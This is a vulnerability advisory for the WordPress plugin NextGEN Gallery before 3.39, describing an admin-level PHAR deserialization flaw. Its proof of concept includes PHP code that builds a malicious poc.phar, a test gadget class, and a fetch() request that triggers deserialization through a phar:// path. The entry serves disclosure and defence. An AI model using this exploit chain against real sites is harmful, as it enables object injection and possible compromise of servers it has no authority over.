WordPress Plugin Vulnerabilities
NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization
Description
The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.
Proof of Concept
1. Ensure your WordPress installation is using PHP version 7.4 or earlier. 2. Create a Gallery and note its ID. 3. Create a `poc.phar` file using the following code, and add it to the root directory of the server: <?php class Evil {} try { $pharFile = 'poc.phar'; if (file_exists($pharFile)) { unlink($pharFile); } $phar = new Phar($pharFile); $phar->startBuffering(); $phar->addFromString( 'test.txt', 'text' ); $phar->setStub( '<?php __HALT_COMPILER(); ?>' ); $phar->setMetadata( new Evil() ); $phar->stopBuffering(); echo "$pharFile successfully created" . PHP_EOL; } catch (Exception $e) { echo $e->getMessage(); } 4. Add the following code to the server to simulate a gadget: class Evil { function __wakeup() { die('Arbitrary deserialization'); } } 5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly. await (await fetch("/index.php", { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" }, "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}', "method": "POST", "mode": "cors" })).text();
Affects Plugins
References
CVE
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Linwz from DEVCORE
Submitter
Linwz from DEVCORE
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-25 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-25 (about 7 months ago)